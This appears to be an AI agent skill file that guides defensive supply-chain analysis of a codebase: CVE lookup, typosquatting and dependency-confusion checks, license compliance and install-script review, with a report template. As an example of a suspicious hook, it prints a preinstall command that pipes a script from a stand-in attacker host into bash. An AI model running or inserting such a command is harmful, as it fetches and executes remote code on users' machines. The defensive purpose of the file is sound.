// Supply chain security analysis (CVEs, dependencies, typosquatting, licenses)
[HINT] Download the complete skill directory including SKILL.md and all related files
| name | perseus-supply-chain |
| description | Supply chain security analysis (CVEs, dependencies, typosquatting, licenses) |
IMPORTANT: This skill performs supply chain security analysis on the user's own codebase. This is defensive security testing to find vulnerable dependencies before they're exploited.
Authorization: The user owns this codebase and has explicitly requested this specialized analysis.
| Language | Package Managers | Manifest Files |
|---|---|---|
| JavaScript/TypeScript | npm, yarn, pnpm, bun | package.json, package-lock.json, yarn.lock, pnpm-lock.yaml |
| Go | go modules | go.mod, go.sum |
| PHP | Composer | composer.json, composer.lock |
| Python | pip, poetry, pipenv | requirements.txt, Pipfile, pyproject.toml, poetry.lock |
| Rust | Cargo | Cargo.toml, Cargo.lock |
| Java | Maven, Gradle | pom.xml, build.gradle, gradle.lockfile |
| Ruby | Bundler | Gemfile, Gemfile.lock |
| C# | NuGet | *.csproj, packages.config, packages.lock.json |
This specialist skill performs comprehensive supply chain analysis including known vulnerabilities (CVEs), dependency confusion, typosquatting, and license compliance.
When to Use: After /scan identifies package manifests, or as regular security hygiene check.
Goal: Identify vulnerable, malicious, or risky dependencies before they compromise the application.
| Mode | Specialist Behavior |
|---|---|
PRODUCTION_SAFE | Manifest and advisory analysis only (passive) |
STAGING_ACTIVE | Controlled resolver/registry validation in staging |
LAB_FULL | Deep dependency behavior validation in isolated lab |
LAB_RED_TEAM | Confusion/typosquat simulation against private test registries only |
deliverables/engagement_profile.md before active package resolution checks.PRODUCTION_SAFE when mode is missing.| Risk | Description | Impact |
|---|---|---|
| Known CVEs | Published vulnerabilities | Exploitation |
| Typosquatting | Malicious similar-named packages | Malware |
| Dependency Confusion | Private/public package name collision | Code execution |
| Outdated Dependencies | Old versions with known issues | Security debt |
| License Issues | GPL in proprietary, license conflicts | Legal risk |
| Malicious Packages | Intentionally harmful packages | Backdoor |
| Abandoned Packages | Unmaintained dependencies | Future risk |
deliverables/engagement_profile.md.deliverables/verification_scope.md if present.Manifest Scanner:
Files to Find:
# JavaScript/TypeScript
package.json
package-lock.json
yarn.lock
pnpm-lock.yaml
bun.lockb
# Go
go.mod
go.sum
# PHP
composer.json
composer.lock
# Python
requirements.txt
requirements-*.txt
Pipfile
Pipfile.lock
pyproject.toml
poetry.lock
# Rust
Cargo.toml
Cargo.lock
# Java
pom.xml
build.gradle
build.gradle.kts
gradle.lockfile
# Ruby
Gemfile
Gemfile.lock
# C#
*.csproj
packages.config
Directory.Packages.props
JavaScript CVE Analyst:
Check Using:
Output Format:
| Package | Version | CVE | Severity | Fixed In |
|---------|---------|-----|----------|----------|
| lodash | 4.17.15 | CVE-2021-23337 | High | 4.17.21 |
Go CVE Analyst:
Check:
Python CVE Analyst:
Check:
Multi-Language CVE Analyst:
Check:
JavaScript Typosquatting Analyst:
Common Patterns:
| Real Package | Typosquat Examples |
|---|---|
| lodash | lodsh, lodahs, 1odash, lodash-utils |
| express | expres, expresss, expess |
| react | raect, reakt, reactjs (unofficial) |
| axios | axois, axio, axiosjs |
Detection Rules:
Multi-Language Typosquatting Analyst:
Python Examples:
| Real Package | Typosquat Examples |
|---|---|
| requests | request, reqeusts |
| django | djang0, djangoo |
| flask | flaask, flaskk |
Private Package Analyst:
Risk Pattern:
// package.json - RISKY
{
"dependencies": {
"@company/internal-lib": "^1.0.0" // If not in private registry...
}
}
Attack:
@company/internal-lib to public npmCheck:
Registry Configuration Analyst:
Files to Check:
.npmrc
.yarnrc
.yarnrc.yml
.pip/pip.conf
~/.config/pip/pip.conf
Major Version Gap Analyst:
Risk Levels:
| Gap | Risk | Example |
|---|---|---|
| 1 major | Low | Using React 17 when 18 is out |
| 2+ major | Medium | Using React 16 when 18 is out |
| EOL | High | Using Node.js 14 (EOL) |
Abandoned Package Analyst:
Indicators:
License Compatibility Analyst:
Risk Matrix:
| Project License | Dependency License | Status |
|---|---|---|
| MIT | MIT | OK |
| MIT | Apache-2.0 | OK |
| MIT | GPL-3.0 | PROBLEM (copyleft) |
| Proprietary | GPL-3.0 | PROBLEM (copyleft) |
| Proprietary | AGPL-3.0 | CRITICAL |
License Discovery Analyst:
Issues:
Install Script Analyst:
Patterns to Flag:
// package.json - SUSPICIOUS
{
"scripts": {
"preinstall": "curl evil.com/shell.sh | bash",
"postinstall": "node ./scripts/setup.js" // Check contents!
}
}
Red Flags:
Dependency Chain Analyst:
Issues:
Lockfile Security Analyst:
Issues:
Create deliverables/supply_chain_analysis.md:
# Supply Chain Security Analysis
## Summary
| Category | Packages Checked | Issues | Critical |
|----------|------------------|--------|----------|
| CVEs | X | Y | Z |
| Typosquatting | X | Y | Z |
| Dependency Confusion | X | Y | Z |
| Outdated | X | Y | Z |
| License | X | Y | Z |
| Malicious | X | Y | Z |
## Languages/Package Managers Detected
- JavaScript: npm (package.json)
- Python: pip (requirements.txt)
- Go: go modules (go.mod)
## Critical Vulnerabilities (CVEs)
### [CVE-2021-44228] Log4Shell in log4j
**Severity:** Critical (CVSS 10.0)
**Package:** org.apache.logging.log4j:log4j-core
**Installed Version:** 2.14.1
**Fixed Version:** 2.17.1
**Location:** pom.xml
**Description:** Remote code execution via JNDI lookup in log messages.
**Remediation:**
```xml
<dependency>
<groupId>org.apache.logging.log4j</groupId>
<artifactId>log4j-core</artifactId>
<version>2.17.1</version>
</dependency>
Severity: High (CVSS 8.0) Package: follow-redirects Installed Version: 1.14.5 Fixed Version: 1.14.7 Location: package-lock.json (transitive via axios)
| Severity | Count | Packages |
|---|---|---|
| Critical | 2 | log4j, lodash |
| High | 5 | axios, node-forge, ... |
| Medium | 12 | ... |
| Low | 8 | ... |
| Installed | Suspicious | Confidence |
|---|---|---|
| lodsh | Likely typosquat of lodash | High |
| requests (in npm) | Python package in npm? | Medium |
| Package | Risk | Recommendation |
|---|---|---|
| @company/core | No registry lock | Add to .npmrc |
| Package | Current | Latest | Gap | Risk |
|---|---|---|---|---|
| react | 16.14.0 | 18.2.0 | 2 major | Medium |
| node | 14.x | 20.x | EOL | High |
| Package | License | Issue |
|---|---|---|
| some-lib | GPL-3.0 | Copyleft in MIT project |
| unknown-pkg | UNLICENSED | No license |
# JavaScript
npm audit fix
npm outdated
# Go
go get -u ./...
govulncheck ./...
# Python
pip-audit
pip list --outdated
# Rust
cargo audit
cargo update
**Next Step:** CVE findings can be verified by checking exploit availability and running automated scanners.